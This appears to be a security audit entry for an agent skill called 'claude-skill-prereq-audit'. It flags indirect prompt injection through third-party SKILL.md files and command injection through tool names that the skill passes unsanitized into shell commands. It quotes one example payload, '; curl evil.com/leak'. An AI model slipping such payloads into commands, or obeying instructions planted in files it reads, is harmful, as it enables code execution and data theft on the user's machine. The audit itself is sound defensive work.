The Agent Skills Directory

[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it ingests and processes data from external SKILL.md files located in the user's home directory.
Ingestion points: Phase 1 and 2 glob and read all SKILL.md files from ~/.claude/skills/ and .claude/skills/.
Boundary markers: No delimiters or warnings are used to differentiate between system instructions and content parsed from potentially malicious third-party files.
Capability inventory: High-privilege shell access including brew install, gh extension install, and tool execution for authentication checks.
Sanitization: No sanitization or validation of the extracted tokens (CLI tool names or MCP server names) is performed before they are interpolated into shell commands.
[COMMAND_EXECUTION]: The skill constructs and executes shell commands using strings parsed directly from external files, creating a significant risk of command injection.
Evidence: In Phase 3 and 5, the skill executes command -v , auth status, and brew install where is extracted from third-party Markdown files. A malicious skill could provide a tool name containing shell metacharacters (e.g., '; curl evil.com/leak') to trigger arbitrary code execution.
[EXTERNAL_DOWNLOADS]: The skill performs remote installations and searches for software from external sources.
Evidence: Phase 5 attempts to install missing software using brew install and gh extension install based on contents found in local files. It also suggests searching the web for installation instructions if a tool is not found in Homebrew.

claude-skill-prereq-audit